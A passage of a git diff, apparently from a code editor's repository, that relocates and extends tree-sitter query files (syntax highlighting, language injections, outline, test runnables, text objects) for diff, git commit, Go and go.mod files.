This should eventually be `@diff.plus` with a fallback of `@string` +] @string @diff.plus [ (deletion) (old_file) -] @keyword -;; TODO: This should eventually be `@diff.minus` with a fallback of `@keyword` +] @keyword @diff.minus (commit) @constant @@ -22,7 +20,7 @@ (mode) @number -([ +[ ".." "+" "++" @@ -32,7 +30,7 @@ "--" "---" "----" -] @punctuation.special) +] @punctuation.special [ (binary_change) diff --git a/crates/grammars/src/diff/injections.scm b/crates/grammars/src/diff/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..2f0e58eb6431515b86b6042e5828263341513e99 --- /dev/null +++ b/crates/grammars/src/diff/injections.scm @@ -0,0 +1,2 @@ +((comment) @injection.content + (#set! injection.language "comment")) diff --git a/crates/languages/src/gitcommit/config.toml b/crates/grammars/src/gitcommit/config.toml similarity index 96% rename from crates/languages/src/gitcommit/config.toml rename to crates/grammars/src/gitcommit/config.toml index c2421ce00613e5848aacab5d1230ab839c8b1388..83cd6f550e3f18c5d8cb61efa4d632ece6c1ad4d 100644 --- a/crates/languages/src/gitcommit/config.toml +++ b/crates/grammars/src/gitcommit/config.toml @@ -7,7 +7,7 @@ path_suffixes = [ "NOTES_EDITMSG", "EDIT_DESCRIPTION", ] -line_comments = ["#"] +line_comments = ["# "] brackets = [ { start = "(", end = ")", close = true, newline = false }, { start = "`", end = "`", close = true, newline = false }, diff --git a/crates/languages/src/gitcommit/highlights.scm b/crates/grammars/src/gitcommit/highlights.scm similarity index 52% rename from crates/languages/src/gitcommit/highlights.scm rename to crates/grammars/src/gitcommit/highlights.scm index 8670a6615aa49b8062a1ef2375884bf298b1df76..750a400f2b147c459d1a7932cd476286dc8189fc 100644 --- a/crates/languages/src/gitcommit/highlights.scm +++ b/crates/grammars/src/gitcommit/highlights.scm @@ -1,18 +1,36 @@ (subject) @markup.heading + (path) @string.special.path + (branch) @string.special.symbol + (commit) @constant + 
(item) @markup.link.url + (header) @tag + (comment) @comment -(change kind: "new file" @diff.plus) -(change kind: "deleted" @diff.minus) -(change kind: "modified" @diff.delta) -(change kind: "renamed" @diff.delta.moved) +(change + kind: "new file" @diff.plus) + +(change + kind: "deleted" @diff.minus) + +(change + kind: "modified" @diff.delta) + +(change + kind: "renamed" @diff.delta.moved) (trailer key: (trailer_key) @variable.other.member value: (trailer_value) @string) -[":" "=" "->" (scissors)] @punctuation.delimiter +[ + ":" + "=" + "->" + (scissors) +] @punctuation.delimiter diff --git a/crates/grammars/src/gitcommit/injections.scm b/crates/grammars/src/gitcommit/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..07c2dd95ca69642b15a7a778ab7e0caad47586cb --- /dev/null +++ b/crates/grammars/src/gitcommit/injections.scm @@ -0,0 +1,8 @@ +((comment) @content + (#set! injection.language "comment")) + +((scissors) @content + (#set! "language" "diff")) + +((rebase_command) @content + (#set! "language" "git_rebase")) diff --git a/crates/grammars/src/go/brackets.scm b/crates/grammars/src/go/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..6bee4099173ee83cc03e4f1d24d7000d102880fb --- /dev/null +++ b/crates/grammars/src/go/brackets.scm @@ -0,0 +1,19 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("`" @open + "`" @close) + (#set! rainbow.exclude)) + +((rune_literal) @open @close + (#set! 
rainbow.exclude)) diff --git a/crates/languages/src/go/config.toml b/crates/grammars/src/go/config.toml similarity index 96% rename from crates/languages/src/go/config.toml rename to crates/grammars/src/go/config.toml index c8589b14d68aa66cd189940c65618b7736b4bfd7..36f885d75fe623eb16b306f0481ac7677ab0d35b 100644 --- a/crates/languages/src/go/config.toml +++ b/crates/grammars/src/go/config.toml @@ -1,6 +1,7 @@ name = "Go" grammar = "go" path_suffixes = ["go"] +modeline_aliases = ["golang"] line_comments = ["// "] first_line_pattern = '^//.*\bgo run\b' autoclose_before = ";:.,=}])>" diff --git a/crates/grammars/src/go/debugger.scm b/crates/grammars/src/go/debugger.scm new file mode 100644 index 0000000000000000000000000000000000000000..306b0448a7d817040562152b39d410100b207f1a --- /dev/null +++ b/crates/grammars/src/go/debugger.scm @@ -0,0 +1,44 @@ +(parameter_declaration + (identifier) @debug-variable) + +(short_var_declaration + (expression_list + (identifier) @debug-variable)) + +(var_declaration + (var_spec + (identifier) @debug-variable)) + +(const_declaration + (const_spec + (identifier) @debug-variable)) + +(assignment_statement + (expression_list + (identifier) @debug-variable)) + +(binary_expression + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(call_expression + (argument_list + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]"))) + +(return_statement + (expression_list + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]"))) + +(range_clause + (expression_list + (identifier) @debug-variable)) + +(parenthesized_expression + (identifier) @debug-variable + (#not-match? 
@debug-variable "^[A-Z]")) + +(block) @debug-scope + +(function_declaration) @debug-scope diff --git a/crates/languages/src/go/highlights.scm b/crates/grammars/src/go/highlights.scm similarity index 95% rename from crates/languages/src/go/highlights.scm rename to crates/grammars/src/go/highlights.scm index 15a512d6b7e359bf7290aee9d433f1ae7be352ec..670b4f05a961e35d3826c294d061ea7757fd1c0f 100644 --- a/crates/languages/src/go/highlights.scm +++ b/crates/grammars/src/go/highlights.scm @@ -1,10 +1,12 @@ (identifier) @variable (type_identifier) @type + (type_spec name: (type_identifier) @type.definition) (field_identifier) @property + (package_identifier) @namespace (label_name) @label @@ -26,6 +28,7 @@ (method_declaration name: (field_identifier) @function.method) + (method_elem name: (field_identifier) @function.method) @@ -144,8 +147,7 @@ ; Go directives ((comment) @preproc - (#match? @preproc "^//go:")) + (#match? @preproc "^//go:")) ((comment) @preproc - (#match? @preproc "^// \\+build")) - + (#match? @preproc "^// \\+build")) diff --git a/crates/grammars/src/go/indents.scm b/crates/grammars/src/go/indents.scm new file mode 100644 index 0000000000000000000000000000000000000000..21e8cf7abbc1420ba94063a7ae6655ec0daa9baa --- /dev/null +++ b/crates/grammars/src/go/indents.scm @@ -0,0 +1,17 @@ +[ + (assignment_statement) + (call_expression) + (selector_expression) +] @indent + +(_ + "[" + "]" @end) @indent + +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent diff --git a/crates/grammars/src/go/injections.scm b/crates/grammars/src/go/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..73cf0bd352de0213f9a0d1efff300039f52a0697 --- /dev/null +++ b/crates/grammars/src/go/injections.scm @@ -0,0 +1,730 @@ +; Refer to https://github.com/nvim-treesitter/nvim-treesitter/blob/master/queries/go/injections.scm#L4C1-L16C41 +((comment) @injection.content + (#set! 
injection.language "comment")) + +(call_expression + (selector_expression) @_function + (#any-of? @_function + "regexp.Match" "regexp.MatchReader" "regexp.MatchString" "regexp.Compile" "regexp.CompilePOSIX" + "regexp.MustCompile" "regexp.MustCompilePOSIX") + (argument_list + . + [ + (raw_string_literal) + (interpreted_string_literal) + ] @injection.content + (#set! injection.language "regex"))) + +; INJECT SQL +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (composite_literal + body: (literal_value + (keyed_element + (comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])))) + (expression_statement + (call_expression + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + 
(raw_string_literal_content) @injection.content) + ]))) +] + (#match? @_comment "^\\/\\*\\s*sql\\s*\\*\\/$") + (#set! injection.language "sql")) + +; INJECT JSON +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (composite_literal + body: (literal_value + (keyed_element + (comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])))) + (expression_statement + (call_expression + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ]))) +] + (#match? @_comment "^\\/\\*\\s*json\\s*\\*\\/") + ; /* json */ or /*json*/ + (#set! 
injection.language "json")) + +; INJECT YAML +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (composite_literal + body: (literal_value + (keyed_element + (comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])))) + (expression_statement + (call_expression + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ]))) +] + (#match? @_comment "^\\/\\*\\s*yaml\\s*\\*\\/") + ; /* yaml */ or /*yaml*/ + (#set! 
injection.language "yaml")) + +; INJECT XML +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (composite_literal + body: (literal_value + (keyed_element + (comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])))) + (expression_statement + (call_expression + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ]))) +] + (#match? @_comment "^\\/\\*\\s*xml\\s*\\*\\/") + ; /* xml */ or /*xml*/ + (#set! 
injection.language "xml")) + +; INJECT HTML +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (composite_literal + body: (literal_value + (keyed_element + (comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])))) + (expression_statement + (call_expression + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ]))) +] + (#match? @_comment "^\\/\\*\\s*html\\s*\\*\\/") + ; /* html */ or /*html*/ + (#set! 
injection.language "html")) + +; INJECT JS +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (composite_literal + body: (literal_value + (keyed_element + (comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])))) + (expression_statement + (call_expression + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ]))) +] + (#match? @_comment "^\\/\\*\\s*js\\s*\\*\\/") + ; /* js */ or /*js*/ + (#set! 
injection.language "javascript")) + +; INJECT CSS +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (composite_literal + body: (literal_value + (keyed_element + (comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])))) + (expression_statement + (call_expression + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ]))) +] + (#match? @_comment "^\\/\\*\\s*css\\s*\\*\\/") + ; /* css */ or /*css*/ + (#set! 
injection.language "css")) + +; INJECT LUA +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (composite_literal + body: (literal_value + (keyed_element + (comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])))) + (expression_statement + (call_expression + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ]))) +] + (#match? @_comment "^\\/\\*\\s*lua\\s*\\*\\/") + ; /* lua */ or /*lua*/ + (#set! 
injection.language "lua")) + +; INJECT BASH +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (composite_literal + body: (literal_value + (keyed_element + (comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])))) + (expression_statement + (call_expression + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ]))) +] + (#match? @_comment "^\\/\\*\\s*bash\\s*\\*\\/") + ; /* bash */ or /*bash*/ + (#set! 
injection.language "bash")) + +; INJECT CSV +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + ((comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ]) +] + (#match? @_comment "^\\/\\*\\s*csv\\s*\\*\\/") + ; /* csv */ or /*csv */ + (#set! 
injection.language "csv")) diff --git a/crates/grammars/src/go/outline.scm b/crates/grammars/src/go/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..da42904fab942635b1140b486dde0c25694147d3 --- /dev/null +++ b/crates/grammars/src/go/outline.scm @@ -0,0 +1,61 @@ +(comment) @annotation + +(type_declaration + "type" @context + [ + (type_spec + name: (_) @name) @item + ("(" + (type_spec + name: (_) @name) @item + ")") + ]) + +(function_declaration + "func" @context + name: (identifier) @name + parameters: (parameter_list + "(" + ")")) @item + +(method_declaration + "func" @context + receiver: (parameter_list + "(" @context + (parameter_declaration + name: (_) @context + type: (_) @context) + ")" @context) + name: (field_identifier) @name + parameters: (parameter_list + "(" + ")")) @item + +(const_declaration + "const" @context + (const_spec + name: (identifier) @name) @item) + +(source_file + (var_declaration + "var" @context + [ + ; The declaration may define multiple variables, and so @item is on + ; the identifier so they get distinct ranges. + (var_spec + name: (identifier) @name @item) + (var_spec_list + (var_spec + name: (identifier) @name @item)) + ])) + +(method_elem + name: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)) @item + +; Fields declarations may define multiple fields, and so @item is on the +; declarator so they each get distinct ranges. 
+(field_declaration + name: (_) @name @item) diff --git a/crates/languages/src/go/overrides.scm b/crates/grammars/src/go/overrides.scm similarity index 99% rename from crates/languages/src/go/overrides.scm rename to crates/grammars/src/go/overrides.scm index aae1520301bbb2a04b04f930b747d290051bc9cc..7989c4271f0ec9f18a6f75315f01d13454fca7b9 100644 --- a/crates/languages/src/go/overrides.scm +++ b/crates/grammars/src/go/overrides.scm @@ -1,4 +1,5 @@ (comment) @comment.inclusive + [ (interpreted_string_literal) (raw_string_literal) diff --git a/crates/grammars/src/go/runnables.scm b/crates/grammars/src/go/runnables.scm new file mode 100644 index 0000000000000000000000000000000000000000..d00be6e1d0db4b8fd97596002099525128458a7f --- /dev/null +++ b/crates/grammars/src/go/runnables.scm @@ -0,0 +1,212 @@ +; Functions names start with `Test` +(((function_declaration + name: (_) @run + (#match? @run "^Test.*") + (#not-match? @run "^TestMain$"))) @_ + (#set! tag go-test)) + +; Suite test methods (testify/suite) +((method_declaration + receiver: (parameter_list + (parameter_declaration + type: [ + (pointer_type + (type_identifier) @_suite_name) + (type_identifier) @_suite_name + ])) + name: (field_identifier) @run @_subtest_name + (#match? @_subtest_name "^Test.*") + (#match? @_suite_name ".*Suite")) @_ + (#set! tag go-testify-suite)) + +; `go:generate` comments +(((comment) @_comment @run + (#match? @_comment "^//go:generate")) + (#set! tag go-generate)) + +; `t.Run` +(((call_expression + function: (selector_expression + field: _ @run @_name + (#eq? @_name "Run")) + arguments: (argument_list + . + [ + (interpreted_string_literal) + (raw_string_literal) + ] @_subtest_name + . + (func_literal + parameters: (parameter_list + (parameter_declaration + name: (identifier) @_param_name + type: (pointer_type + (qualified_type + package: (package_identifier) @_pkg + name: (type_identifier) @_type + (#eq? @_pkg "testing") + (#eq? @_type "T")))))) @_second_argument))) @_ + (#set! 
tag go-subtest)) + +; Functions names start with `Example` +(((function_declaration + name: (_) @run @_name + (#match? @_name "^Example.*"))) @_ + (#set! tag go-example)) + +; Functions names start with `Benchmark` +(((function_declaration + name: (_) @run @_name + (#match? @_name "^Benchmark.*"))) @_ + (#set! tag go-benchmark)) + +; Functions names start with `Fuzz` +(((function_declaration + name: (_) @run @_name + (#match? @_name "^Fuzz"))) @_ + (#set! tag go-fuzz)) + +; go run +(((function_declaration + name: (_) @run + (#eq? @run "main"))) @_ + (#set! tag go-main)) + +; Table test cases - slice and map with explicit variable +((short_var_declaration + left: (expression_list + (identifier) @_collection_var) + right: (expression_list + (composite_literal + type: [ + (slice_type) + (map_type + key: (type_identifier) @_key_type + (#eq? @_key_type "string")) + ] + body: (literal_value + [ + (literal_element + (literal_value + (keyed_element + (literal_element + (identifier) @_field_name) + (literal_element + [ + (interpreted_string_literal) @run @_table_test_case_name + (raw_string_literal) @run @_table_test_case_name + ])))) + (keyed_element + (literal_element + [ + (interpreted_string_literal) @run @_table_test_case_name + (raw_string_literal) @run @_table_test_case_name + ])) + ])))) + (for_statement + (range_clause + left: (expression_list + [ + ((identifier) + (identifier) @_loop_var_inner) + (identifier) @_loop_var_outer + ]) + right: (identifier) @_range_var + (#eq? @_range_var @_collection_var)) + body: (block + (statement_list + (expression_statement + (call_expression + function: (selector_expression + operand: (identifier) + field: (field_identifier) @_run_method + (#eq? @_run_method "Run")) + arguments: (argument_list + . + [ + (selector_expression + operand: (identifier) @_tc_var + (#eq? @_tc_var @_loop_var_inner) + field: (field_identifier) @_field_check + (#eq? @_field_check @_field_name)) + (identifier) @_arg_var + (#eq? 
@_arg_var @_loop_var_outer) + ] + . + (func_literal + parameters: (parameter_list + (parameter_declaration + type: (pointer_type + (qualified_type + package: (package_identifier) @_pkg + name: (type_identifier) @_type + (#eq? @_pkg "testing") + (#eq? @_type "T")))))))))))) @_ + (#set! tag go-table-test-case)) + +; Table test cases - slice and map declared right inside the loop without +; explicit variable +((for_statement + (range_clause + left: (expression_list + [ + ((identifier) + (identifier) @_loop_var_inner) + (identifier) @_loop_var_outer + ]) + right: (composite_literal + type: [ + (slice_type) + (map_type + key: (type_identifier) @_key_type + (#eq? @_key_type "string")) + ] + body: (literal_value + [ + (literal_element + (literal_value + (keyed_element + (literal_element + (identifier) @_field_name) + (literal_element + [ + (interpreted_string_literal) @run @_table_test_case_name + (raw_string_literal) @run @_table_test_case_name + ])))) + (keyed_element + (literal_element + [ + (interpreted_string_literal) @run @_table_test_case_name + (raw_string_literal) @run @_table_test_case_name + ])) + ]))) + body: (block + (statement_list + (expression_statement + (call_expression + function: (selector_expression + operand: (identifier) + field: (field_identifier) @_run_method + (#eq? @_run_method "Run")) + arguments: (argument_list + . + [ + (selector_expression + operand: (identifier) @_tc_var + (#eq? @_tc_var @_loop_var_inner) + field: (field_identifier) @_field_check + (#eq? @_field_check @_field_name)) + (identifier) @_arg_var + (#eq? @_arg_var @_loop_var_outer) + ] + . + (func_literal + parameters: (parameter_list + (parameter_declaration + type: (pointer_type + (qualified_type + package: (package_identifier) @_pkg + name: (type_identifier) @_type + (#eq? @_pkg "testing") + (#eq? @_type "T")))))))))))) @_ + (#set! 
tag go-table-test-case-without-explicit-variable)) diff --git a/crates/grammars/src/go/semantic_token_rules.json b/crates/grammars/src/go/semantic_token_rules.json new file mode 100644 index 0000000000000000000000000000000000000000..612076463c25cf9219589aa83160e537cd743061 --- /dev/null +++ b/crates/grammars/src/go/semantic_token_rules.json @@ -0,0 +1,12 @@ +[ + { + "token_type": "variable", + "token_modifiers": ["readonly"], + "style": ["constant"] + }, + { + "token_type": "string", + "token_modifiers": ["format"], + "style": ["string.special"] + } +] diff --git a/crates/grammars/src/go/textobjects.scm b/crates/grammars/src/go/textobjects.scm new file mode 100644 index 0000000000000000000000000000000000000000..4e0a78991a4b1ca49f48b0c1c73c51ff5e002f50 --- /dev/null +++ b/crates/grammars/src/go/textobjects.scm @@ -0,0 +1,28 @@ +(function_declaration + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(method_declaration + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(type_declaration + (type_spec + (struct_type + (field_declaration_list + ("{" + (_)* @class.inside + "}")?)))) @class.around + +(type_declaration + (type_spec + (interface_type + (_)* @class.inside))) @class.around + +(type_declaration) @class.around + +(comment)+ @comment.around diff --git a/crates/languages/src/gomod/config.toml b/crates/grammars/src/gomod/config.toml similarity index 88% rename from crates/languages/src/gomod/config.toml rename to crates/grammars/src/gomod/config.toml index e70c9358bfc6f467b69897fa6d20dd9ae0082f9a..d151db961106591c07850034f669304db7edb650 100644 --- a/crates/languages/src/gomod/config.toml +++ b/crates/grammars/src/gomod/config.toml @@ -2,7 +2,7 @@ name = "Go Mod" code_fence_block_name = "go.mod" grammar = "gomod" path_suffixes = ["mod"] -line_comments = ["//"] +line_comments = ["// "] autoclose_before = ")" brackets = [ { start = "(", end = ")", close = true, newline = true} diff --git 
a/crates/languages/src/gomod/highlights.scm b/crates/grammars/src/gomod/highlights.scm similarity index 85% rename from crates/languages/src/gomod/highlights.scm rename to crates/grammars/src/gomod/highlights.scm index 03be1b5957160820033d93b35b39d4329b7890a6..f026035cb126382274e783ece2515148b6cffd73 100644 --- a/crates/languages/src/gomod/highlights.scm +++ b/crates/grammars/src/gomod/highlights.scm @@ -15,6 +15,6 @@ (comment) @comment [ -(version) -(go_version) + (version) + (go_version) ] @string diff --git a/crates/grammars/src/gomod/injections.scm b/crates/grammars/src/gomod/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..2f0e58eb6431515b86b6042e5828263341513e99 --- /dev/null +++ b/crates/grammars/src/gomod/injections.scm @@ -0,0 +1,2 @@ +((comment) @injection.content + (#set! injection.language "comment")) diff --git a/crates/grammars/src/gomod/structure.scm b/crates/grammars/src/gomod/structure.scm new file mode 100644 index 0000000000000000000000000000000000000000..2da1b0d5e643d2235b9555c15cfe3624f14758f2 --- /dev/null +++ b/crates/grammars/src/gomod/structure.scm @@ -0,0 +1,29 @@ +(require_directive + "require" @structure.anchor + "(" @structure.open + ")" @structure.close) + +(exclude_directive + "exclude" @structure.anchor + "(" @structure.open + ")" 